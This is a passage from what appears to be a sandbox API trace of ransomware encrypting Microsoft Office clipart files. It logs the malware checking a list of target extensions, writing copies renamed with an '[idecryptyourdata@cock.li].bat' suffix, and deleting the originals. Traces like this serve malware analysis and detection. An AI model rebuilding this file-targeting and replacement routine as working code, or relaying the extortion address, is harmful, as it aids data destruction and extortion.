office\\root\\clipart\\pub60cor\\j0107258.wmf")) returned 1 [0183.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF") returned 68 [0183.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF") returned 68 [0183.145] lstrlenW (lpString=".doc") returned 4 [0183.145] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.145] lstrlenW (lpString=".docx") returned 5 [0183.145] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0183.145] lstrlenW (lpString=".pdf") returned 4 [0183.145] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.145] lstrlenW (lpString=".xls") returned 4 [0183.145] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.145] lstrlenW (lpString=".xlsx") returned 5 [0183.145] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0183.145] lstrlenW (lpString=".ppt") returned 4 [0183.145] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF") returned 68 [0183.145] lstrlenW (lpString=".zip") returned 4 [0183.145] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.146] lstrlenW (lpString=".rar") returned 4 [0183.146] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.146] lstrlenW (lpString=".bz2") returned 4 [0183.146] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.146] lstrlenW (lpString=".7z") returned 3 [0183.146] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF") returned 68 [0183.146] lstrlenW (lpString=".dbf") returned 4 [0183.146] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF") returned 68 [0183.146] lstrlenW (lpString=".1cd") returned 4 [0183.146] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF") returned 68 [0183.146] lstrlenW (lpString=".jpg") returned 4 [0183.146] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF") returned 68 [0183.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF") returned 68 [0183.146] lstrlenW (lpString=".doc") returned 4 [0183.146] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.146] lstrlenW (lpString=".docx") returned 5 [0183.146] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0183.146] lstrlenW (lpString=".pdf") returned 4 [0183.146] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.146] lstrlenW (lpString=".xls") returned 4 [0183.146] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.146] lstrlenW (lpString=".xlsx") returned 5 [0183.146] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0183.146] lstrlenW (lpString=".ppt") returned 4 [0183.146] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF") returned 68 [0183.146] lstrlenW (lpString=".zip") returned 4 [0183.146] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.146] lstrlenW (lpString=".rar") returned 4 [0183.146] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.146] lstrlenW (lpString=".bz2") returned 4 [0183.146] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.147] lstrlenW (lpString=".7z") returned 3 [0183.147] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF") returned 68 [0183.147] lstrlenW (lpString=".dbf") returned 4 [0183.147] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF") returned 68 [0183.147] lstrlenW (lpString=".1cd") returned 4 [0183.147] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF") returned 68 [0183.147] lstrlenW (lpString=".jpg") returned 4 [0183.147] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.147] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0183.147] lstrlenW (lpString="J0107262.WMF") returned 12 [0183.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107262.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0183.148] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=7996) returned 1 [0183.148] CloseHandle (hObject=0x334) returned 1 [0183.148] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107262.wmf")) returned 0x220 [0183.148] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107262.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107262.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0183.148] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.148] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107262.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0183.149] GetLastError () returned 0x0 [0183.149] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1f3c, lpOverlapped=0x0) returned 1 [0183.151] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1f40, lpOverlapped=0x0) returned 1 [0183.952] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.953] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.953] SetEndOfFile (hFile=0x380) returned 1 [0183.953] CloseHandle (hObject=0x380) returned 1 [0183.953] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.953] SetEndOfFile (hFile=0x334) returned 1 [0183.954] CloseHandle (hObject=0x334) returned 1 [0183.954] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.954] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107262.wmf")) returned 1 [0183.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF") returned 68 [0183.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF") returned 68 [0183.955] lstrlenW (lpString=".doc") returned 4 [0183.955] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.955] lstrlenW (lpString=".docx") returned 5 [0183.955] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0183.955] lstrlenW (lpString=".pdf") returned 4 [0183.955] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.955] lstrlenW (lpString=".xls") returned 4 [0183.955] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.955] lstrlenW (lpString=".xlsx") returned 5 [0183.955] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0183.955] lstrlenW (lpString=".ppt") returned 4 [0183.955] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF") returned 68 [0183.955] lstrlenW (lpString=".zip") returned 4 [0183.955] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.955] lstrlenW (lpString=".rar") returned 4 [0183.955] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.955] lstrlenW (lpString=".bz2") returned 4 [0183.955] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.955] lstrlenW (lpString=".7z") returned 3 [0183.955] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF") returned 68 [0183.955] lstrlenW (lpString=".dbf") returned 4 [0183.956] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF") returned 68 [0183.956] lstrlenW (lpString=".1cd") returned 4 [0183.956] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF") returned 68 [0183.956] lstrlenW (lpString=".jpg") returned 4 [0183.956] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF") returned 68 [0183.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF") returned 68 [0183.956] lstrlenW (lpString=".doc") returned 4 [0183.956] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.956] lstrlenW (lpString=".docx") returned 5 [0183.956] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0183.956] lstrlenW (lpString=".pdf") returned 4 [0183.956] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.956] lstrlenW (lpString=".xls") returned 4 [0183.956] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.956] lstrlenW (lpString=".xlsx") returned 5 [0183.956] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0183.956] lstrlenW (lpString=".ppt") returned 4 [0183.956] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF") returned 68 [0183.956] lstrlenW (lpString=".zip") returned 4 [0183.956] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.956] lstrlenW (lpString=".rar") returned 4 [0183.956] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.956] lstrlenW (lpString=".bz2") returned 4 [0183.957] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.957] lstrlenW (lpString=".7z") returned 3 [0183.957] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF") returned 68 [0183.957] lstrlenW (lpString=".dbf") returned 4 [0183.957] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF") returned 68 [0183.957] lstrlenW (lpString=".1cd") returned 4 [0183.957] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF") returned 68 [0183.957] lstrlenW (lpString=".jpg") returned 4 [0183.957] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.957] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0183.957] lstrlenW (lpString="J0107344.WMF") returned 12 [0183.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107344.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0183.958] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=5076) returned 1 [0183.958] CloseHandle (hObject=0x334) returned 1 [0183.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107344.wmf")) returned 0x220 [0183.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107344.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107344.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0183.958] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.958] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107344.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0183.959] GetLastError () returned 0x0 [0183.959] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x13d4, lpOverlapped=0x0) returned 1 [0183.961] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x13e0, lpOverlapped=0x0) returned 1 [0183.962] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.962] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.963] SetEndOfFile (hFile=0x380) returned 1 [0183.963] CloseHandle (hObject=0x380) returned 1 [0183.963] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.963] SetEndOfFile (hFile=0x334) returned 1 [0183.964] CloseHandle (hObject=0x334) returned 1 [0183.964] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.964] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107344.wmf")) returned 1 [0183.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF") returned 68 [0183.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF") returned 68 [0183.965] lstrlenW (lpString=".doc") returned 4 [0183.965] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.965] lstrlenW (lpString=".docx") returned 5 [0183.965] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0183.965] lstrlenW (lpString=".pdf") returned 4 [0183.965] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.965] lstrlenW (lpString=".xls") returned 4 [0183.965] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.965] lstrlenW (lpString=".xlsx") returned 5 [0183.965] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0183.965] lstrlenW (lpString=".ppt") returned 4 [0183.965] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF") returned 68 [0183.965] lstrlenW (lpString=".zip") returned 4 [0183.965] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.965] lstrlenW (lpString=".rar") returned 4 [0183.965] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.965] lstrlenW (lpString=".bz2") returned 4 [0183.965] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.965] lstrlenW (lpString=".7z") returned 3 [0183.965] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF") returned 68 [0183.965] lstrlenW (lpString=".dbf") returned 4 [0183.965] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF") returned 68 [0183.965] lstrlenW (lpString=".1cd") returned 4 [0183.965] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF") returned 68 [0183.965] lstrlenW (lpString=".jpg") returned 4 [0183.965] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF") returned 68 [0183.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF") returned 68 [0183.966] lstrlenW (lpString=".doc") returned 4 [0183.966] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.966] lstrlenW (lpString=".docx") returned 5 [0183.966] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0183.966] lstrlenW (lpString=".pdf") returned 4 [0183.966] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.966] lstrlenW (lpString=".xls") returned 4 [0183.966] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.966] lstrlenW (lpString=".xlsx") returned 5 [0183.966] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0183.966] lstrlenW (lpString=".ppt") returned 4 [0183.966] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF") returned 68 [0183.966] lstrlenW (lpString=".zip") returned 4 [0183.966] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.966] lstrlenW (lpString=".rar") returned 4 [0183.966] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.966] lstrlenW (lpString=".bz2") returned 4 [0183.966] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.966] lstrlenW (lpString=".7z") returned 3 [0183.966] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF") returned 68 [0183.966] lstrlenW (lpString=".dbf") returned 4 [0183.966] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF") returned 68 [0183.966] lstrlenW (lpString=".1cd") returned 4 [0183.966] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF") returned 68 [0183.966] lstrlenW (lpString=".jpg") returned 4 [0183.967] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.968] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0183.968] lstrlenW (lpString="J0107350.WMF") returned 12 [0183.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107350.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0183.968] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=23672) returned 1 [0183.970] CloseHandle (hObject=0x334) returned 1 [0183.970] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107350.wmf")) returned 0x220 [0183.970] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107350.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107350.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0183.971] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.971] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107350.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0183.972] GetLastError () returned 0x0 [0183.972] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x5c78, lpOverlapped=0x0) returned 1 [0183.974] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x5c80, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x5c80, lpOverlapped=0x0) returned 1 [0183.976] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.976] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.976] SetEndOfFile (hFile=0x380) returned 1 [0183.976] CloseHandle (hObject=0x380) returned 1 [0183.976] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.976] SetEndOfFile (hFile=0x334) returned 1 [0183.977] CloseHandle (hObject=0x334) returned 1 [0183.977] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.978] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107350.wmf")) returned 1 [0183.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF") returned 68 [0183.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF") returned 68 [0183.978] lstrlenW (lpString=".doc") returned 4 [0183.978] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.978] lstrlenW (lpString=".docx") returned 5 [0183.978] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0183.978] lstrlenW (lpString=".pdf") returned 4 [0183.978] lstrcmpiW (lpString1=".pdf", 